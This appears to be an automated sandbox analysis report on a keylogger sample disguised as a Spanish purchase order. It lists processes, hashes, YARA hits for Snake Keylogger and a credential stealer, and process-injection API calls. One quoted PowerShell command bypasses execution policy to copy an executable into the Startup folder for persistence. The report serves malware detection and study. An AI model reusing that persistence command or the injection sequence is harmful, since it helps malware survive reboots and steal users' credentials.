MD5 hash:	DFD66604CA0898E8E26DF7B1635B6326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:20:01
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:20:01
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	06:20:02
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:	0x790000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000009.00000002.1422193050.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:20:02
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:20:02
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
Imagebase:	0x80000
File size:	457'216 bytes
MD5 hash:	3F92A35BA26FF7A11A49E15EFE18F0C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:20:02
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:20:03
Start date:	27/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7596 -s 1620
Imagebase:	0x7ff601f70000
File size:	576'896 bytes
MD5 hash:	59550DE0393B1CDD584A1467D6D734E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:20:04
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:	0x900000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	06:20:18
Start date:	27/05/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
Imagebase:	0x410000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:20:18
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB11690002 Relevance: 7.2, Strings: 4, Instructions: 2234COMMON

Download Yara Rule

Strings

"9 o, xrefs: 00007FFB11690375
"9 o, xrefs: 00007FFB11690462
A, xrefs: 00007FFB11690786
6 o, xrefs: 00007FFB1169150E

Memory Dump Source

Source File: 00000003.00000002.1501820782.00007FFB11690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11690000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: 6 o$"9 o$"9 o$A
API String ID: 0-109341944
Opcode ID: 521dc4dc0c00ec43510645a848a3726dbe8c1d5f281a451a268ca90da610652f
Instruction ID: 78857ccddb6008c72f681299b9348c0bef016caab9d2f67b68dce5da86c3708e
Opcode Fuzzy Hash: 521dc4dc0c00ec43510645a848a3726dbe8c1d5f281a451a268ca90da610652f
Instruction Fuzzy Hash: E1E216B280DBCA8FE756DF38CC551A47FA5EF56320B1901FED088CB197DA296846C781

Function 00007FFB1146CC91 Relevance: 5.9, Strings: 4, Instructions: 913COMMON

Download Yara Rule

Strings

#cw, xrefs: 00007FFB1146CD26
!Sw, xrefs: 00007FFB1146CD36
Kw, xrefs: 00007FFB1146CD3E
"[w, xrefs: 00007FFB1146CD2E

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: Kw$!Sw$"[w$#cw
API String ID: 0-3565662394
Opcode ID: d4959437c46c4a89fce974629981321383dbba048b0e2a6d99dde219d53f1c5c
Instruction ID: 94c399e913a085222ebca6fb19bfc8dbabc62db8f1aee3b4a6cd4b92bda216b3
Opcode Fuzzy Hash: d4959437c46c4a89fce974629981321383dbba048b0e2a6d99dde219d53f1c5c
Instruction Fuzzy Hash: 5862F5B1A0CE864BE765EB38D4522F9B7D6EF45734F0404BEC48E87182DE287892CB51

Function 00007FFB1146C2A3 Relevance: 4.7, Strings: 3, Instructions: 992
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$3|, xrefs: 00007FFB1146C856
^F`, xrefs: 00007FFB1146C2FA
^:l, xrefs: 00007FFB1146C299

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: $3|$^:l$^F`
API String ID: 0-3270335487
Opcode ID: 089ac1f61bfa2bef330f59eb5280169394fc3a5dc3d96e4a64ba77d352e6a714
Instruction ID: 1d6413fa02a1749d20403e69e8bbf2b5192de289405dc987d28f0f48e37707ec
Opcode Fuzzy Hash: 089ac1f61bfa2bef330f59eb5280169394fc3a5dc3d96e4a64ba77d352e6a714
Instruction Fuzzy Hash: C05267B3E1CA521AEB15B73DF8422F977D0EF81378B04417BD188CA193DE5875868AD8

Function 00007FFB1146FE40 Relevance: 4.2, Strings: 3, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6 o, xrefs: 00007FFB1146FF5F
/ o, xrefs: 00007FFB114700B7
/ o, xrefs: 00007FFB1146FEEF

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: r6 o$/ o$/ o
API String ID: 0-339178913
Opcode ID: 2e0f0180013841ad24166e941c9f530bd539d433f1b6f931e1fea0145ddd21ba
Instruction ID: 87534ae610364f864d40c4120c3d804f38cc2786f92e6a6018c9bdd1bcf6e3cf
Opcode Fuzzy Hash: 2e0f0180013841ad24166e941c9f530bd539d433f1b6f931e1fea0145ddd21ba
Instruction Fuzzy Hash: BEF1B170618E468FD769CA38C4956BAB3E6FF99714F10453DD49F83286CE34B852CB81

Function 00007FFB1146356D Relevance: 3.2, Strings: 2, Instructions: 687
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_^, xrefs: 00007FFB114636D1
r6 o, xrefs: 00007FFB1148B352

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: L_^$r6 o
API String ID: 0-393606168
Opcode ID: d7ae52c2d98d80066238f19c1049ea576fc32345697cc458c5ea20da229ae5c1
Instruction ID: eb1db70a9cfa3584590e1552fd7d4f60f53c891e8545c2b1e8042b968a0ca225
Opcode Fuzzy Hash: d7ae52c2d98d80066238f19c1049ea576fc32345697cc458c5ea20da229ae5c1
Instruction Fuzzy Hash: FF0259A3B1CA561AEB11B7BDF8562FD7B91DF857B5B10007BE088C6193CE0864828BD1

Function 00007FFB11465052 Relevance: 1.6, APIs: 1, Instructions: 108
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FFB1147C24B

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fc4a27d7f03bf5d989fdc154a12cd38b5448be421665bc4eb4e70c03e5b9793b
Instruction ID: b42014746bc7ff66ad23824093146cd0a043cdaee057dd7e9774d27c084bcb53
Opcode Fuzzy Hash: fc4a27d7f03bf5d989fdc154a12cd38b5448be421665bc4eb4e70c03e5b9793b
Instruction Fuzzy Hash: 8131B471918A088FDB28EFACD84A6FAB7E4EB65711F00412ED04AD3651DB70B4468B91

Function 00007FFB11465482 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE ref: 00007FFB1147BE7E

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 15b9ba2d33c9f19eeb1ce629801cdb96c60b8626b3c4b619064d75f75f916c24
Instruction ID: d4df55ad430f6ce84a620fa820edf60ded82e61445580d4b3d06ddf1e4243da9
Opcode Fuzzy Hash: 15b9ba2d33c9f19eeb1ce629801cdb96c60b8626b3c4b619064d75f75f916c24
Instruction Fuzzy Hash: 9A218171908E1C9FDB58DF58C849BFABBE1FB69321F10822FD00AD3651DB70A4168B91

Function 00007FFB1146642D Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFB114664AF

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 36202279d5593f551b6735674023ec8282ee398272a1af59c72ca1ca7fddb06a
Instruction ID: 9fb9066f58a37f02d50769451cfbcd2fcdd95f87451ea388d4c70cfd218ab51c
Opcode Fuzzy Hash: 36202279d5593f551b6735674023ec8282ee398272a1af59c72ca1ca7fddb06a
Instruction Fuzzy Hash: 20218E7190CB4C8FDB68DFA8D88ABEABBF1EB65321F00416FD049D3652DB616805CB51

Function 00007FFB116911E2 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1501820782.00007FFB11690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11690000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fd083ab056b80b7cf5e1fca7a292c9f77fea9192b2cde6d6e275a5934eb691
Instruction ID: 1cec93372075b51251b9d8495ed7523cb31e45c64adaf71ec4eb791e47f0b2bb
Opcode Fuzzy Hash: d9fd083ab056b80b7cf5e1fca7a292c9f77fea9192b2cde6d6e275a5934eb691
Instruction Fuzzy Hash: 3941F5B190CE8E8FDB55DF38CC550A87BF6FF55320B2401BED04AC7596DA2AA841C780

Function 00007FFB11690A04 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1501820782.00007FFB11690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11690000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e994145d02051117b1997bfd2311c07217465fb2feac275e4fbda12fdbe57e9e
Instruction ID: aa5e4a779a728dd1cbd2031e0ad7453b653e22bbef0875d762ce5def0c9d3267
Opcode Fuzzy Hash: e994145d02051117b1997bfd2311c07217465fb2feac275e4fbda12fdbe57e9e
Instruction Fuzzy Hash: B6E0E531A14A6D8ADF60DA18D881BDDB3B1EB48210F0041E6D44DA3241CA306A848F42

Non-executed Functions

Function 00007FFB1146D218 Relevance: 3.0, Strings: 2, Instructions: 490COMMON

Download Yara Rule

Strings

mp, xrefs: 00007FFB1146D39E
soK, xrefs: 00007FFB1146D516

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: mp$soK
API String ID: 0-1879249054
Opcode ID: b7e98194c9da4b2b0f75c9fa36eb1a3fb6e083c71e15ad76de2054568f059260
Instruction ID: 9dd9095b8b0ad95c0df210527f017535336598be1ca6c55132f5516b44a37cb4
Opcode Fuzzy Hash: b7e98194c9da4b2b0f75c9fa36eb1a3fb6e083c71e15ad76de2054568f059260
Instruction Fuzzy Hash: 78D1F7B7A1CA2619EB05B63EF4412FD6794EFC13BDB004277D288C9193DE0875C69AE4

Function 00007FFB1146C7A3 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

$3|, xrefs: 00007FFB1146C856

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID: $3|
API String ID: 0-2721373477
Opcode ID: f2c5496fcbf261f5c58a96b5d10fdcf0ad496aa21202cd221c146aca67efa8ee
Instruction ID: 35e15cbc28dfdb5db5c759360bc4107b1a512a45eb6e7e603433db2e872f2009
Opcode Fuzzy Hash: f2c5496fcbf261f5c58a96b5d10fdcf0ad496aa21202cd221c146aca67efa8ee
Instruction Fuzzy Hash: 886135B7E2CA1246EB14B63DF8452F83385EF8277CB10813BD189C91A3DE1831579D98

Function 00007FFB11472610 Relevance: 1.0, Instructions: 962COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1498956808.00007FFB11460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb11460000_NUEVA ORDEN DE COMPRAsxlx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65831662f707630cd251605d48cb85a778f7c5206d9635de8a99b5610c9191d4
Instruction ID: 7bcace708b5ebadfa51aba26d4a0e8e4d4b08466797a95b6fb8685e5e239e3e6
Opcode Fuzzy Hash: 65831662f707630cd251605d48cb85a778f7c5206d9635de8a99b5610c9191d4
Instruction Fuzzy Hash: 8E62467060CE854FE756EB38C855ABA7BE5EF46720F0805BED4CAC7193DA28AC42C751

Analysis Process: RegSvcs.exePID: 7924, Parent PID: 7596COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 0298F0F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0298F1C3

Strings

-Bz, xrefs: 0298F112

Memory Dump Source

Source File: 00000009.00000002.1413334967.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2980000_RegSvcs.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: -Bz
API String ID: 3559483778-1483871809
Opcode ID: c479721c01bf70124139a09f07e7e72193b2d8b556ff4197970618a243224a4a
Instruction ID: a1c851ad6180aace77d694359304b2579a57944b4ba782137e6cd38ce0293ed2
Opcode Fuzzy Hash: c479721c01bf70124139a09f07e7e72193b2d8b556ff4197970618a243224a4a
Instruction Fuzzy Hash: A041B8B4D012489FDF00DFA9D984AEEFBF1BB09300F14942AE818B7250D379AA45CF64

Function 0298F248 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0298F2F2

Strings

-Bz, xrefs: 0298F262

Memory Dump Source

Source File: 00000009.00000002.1413334967.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2980000_RegSvcs.jbxd

Similarity

API ID: AllocVirtual
String ID: -Bz
API String ID: 4275171209-1483871809
Opcode ID: bf93ec82bed5625efc9589d988c6219b7597e12a599086466c1d1082b6ca69db
Instruction ID: 9c1363dafc455514bb4a258df245197fbb683656012cf9f269927e9deb3db09c
Opcode Fuzzy Hash: bf93ec82bed5625efc9589d988c6219b7597e12a599086466c1d1082b6ca69db
Instruction Fuzzy Hash: 963195B9D042489FCF10CFA9E980A9EBBB1AB49310F14A42AE914B7210D775A941CF69

Function 0298EFC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0298F077

Strings

-Bz, xrefs: 0298EFE7

Memory Dump Source

Source File: 00000009.00000002.1413334967.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2980000_RegSvcs.jbxd

Similarity

API ID: ContextThreadWow64
String ID: -Bz
API String ID: 983334009-1483871809
Opcode ID: 4f857aff6a72cd6bcdac7b4aee40592212a7a3a5c36d3bb40796a2fb66163683
Instruction ID: 3ba9956c61982da4279d099ba93ce287ae5100959b71929422424f7abe8083e8
Opcode Fuzzy Hash: 4f857aff6a72cd6bcdac7b4aee40592212a7a3a5c36d3bb40796a2fb66163683
Instruction Fuzzy Hash: F731BBB4D002589FDB10DFAAD884AEEBBF1AB49314F24902AE418B7250D779A985CF54

Function 0298F368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0298F3E6

Strings

-Bz, xrefs: 0298F382

Memory Dump Source

Source File: 00000009.00000002.1413334967.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2980000_RegSvcs.jbxd

Similarity

API ID: ResumeThread
String ID: -Bz
API String ID: 947044025-1483871809
Opcode ID: 45f93b16c449d4c04e36f64d452b6571b41652c15cc882e0152cc0387383a74a
Instruction ID: 63e466ccfaa71d2be1b092a991ee6f7e07313a9a2adb79186e440037d1bc75c2
Opcode Fuzzy Hash: 45f93b16c449d4c04e36f64d452b6571b41652c15cc882e0152cc0387383a74a
Instruction Fuzzy Hash: 8B31C9B4D002089FDF10DFAAE884A9EFBF4EB49310F14942AE818B7310C779A941CF54

Function 027ED5B8 Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1411735146.00000000027ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 027ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27ed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521002469f75330b33dab24d49a68b73904fa2b6c907799735c0b337e42c4aba
Instruction ID: aba5ddf3695141555f6841d9fb7e2b5300ed101c9df2cba270336abd3290de1f
Opcode Fuzzy Hash: 521002469f75330b33dab24d49a68b73904fa2b6c907799735c0b337e42c4aba
Instruction Fuzzy Hash: DA2125B1504244DFDF25DF14D9C4B2ABFA9FB8C318F2085A9D80A0B246C336D856CBB2

Function 027ED5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1411735146.00000000027ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 027ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27ed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction ID: 97b2767c87585e4b02d70d40a380fd51d5438964fe16f86b50a61e2c8f22cca8
Opcode Fuzzy Hash: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction Fuzzy Hash: A411B6B6504244DFCF15CF14D5C4B56BF72FB88314F24C6A9D80A4B656C336D456CBA1

Analysis Process: powershell.exePID: 8012, Parent PID: 7924COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	451
Total number of Limit Nodes:	31

Executed Functions

Function 08369028 Relevance: 5.9, Strings: 4, Instructions: 925
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"Cq, xrefs: 083696EF
"Cq, xrefs: 08369CC5
"Cq, xrefs: 08369ABA
fBIq, xrefs: 08369667

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: "Cq$"Cq$"Cq$fBIq
API String ID: 0-3557798957
Opcode ID: 690d44c5fd4b61caf89e29cb57d78a1b24a8a148a8dd77e97c2af8abe72267fc
Instruction ID: bbef59bc0a914288a3dafccb41d20ddaa7ba8f3c96e424085dfb67be03504283
Opcode Fuzzy Hash: 690d44c5fd4b61caf89e29cb57d78a1b24a8a148a8dd77e97c2af8abe72267fc
Instruction Fuzzy Hash: 54820A34B002198FDB54DF69D894BAEB7F2AF88300F1485A9D80AEB355DB35AD46CF50

Function 0819E228 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455354910.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4813edf425704b6c9cb28d4f883f49efb68042baac3f538796ee74ea4c163e
Instruction ID: d9a5bcb232074ca3bf12825a4f9475307bddd676a953f2772642696011f4e48a
Opcode Fuzzy Hash: ef4813edf425704b6c9cb28d4f883f49efb68042baac3f538796ee74ea4c163e
Instruction Fuzzy Hash: 57425F34A00319DBEB15DB64C850BA9B776FF89300F1085A9E90A7B391DF75AD81CFA1

Function 0810B8E8 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41bf7da5cf1d27afff5357cd1b027a818fc9ed1a665cdd45e026a42158eff83
Instruction ID: c1ea400bdbe7fc01b0bc0cd95abdd6a85a9bf71365e5ec23f4736cef3ca152b2
Opcode Fuzzy Hash: c41bf7da5cf1d27afff5357cd1b027a818fc9ed1a665cdd45e026a42158eff83
Instruction Fuzzy Hash: 0D024A34A00209DFDB14DFA9C884A9EB7B6FF88361F148558E806DB394DB74ED46CB90

Function 082A3A40 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d32b730ef90fcb10a5ede43fbd1584f6a1d4a88ac038bb6a66d47e5f467f7b
Instruction ID: c9ed4f1189df3bb10e13eacf2bc852fa4f53e7273b9677551d23cf9f92a5904a
Opcode Fuzzy Hash: 33d32b730ef90fcb10a5ede43fbd1584f6a1d4a88ac038bb6a66d47e5f467f7b
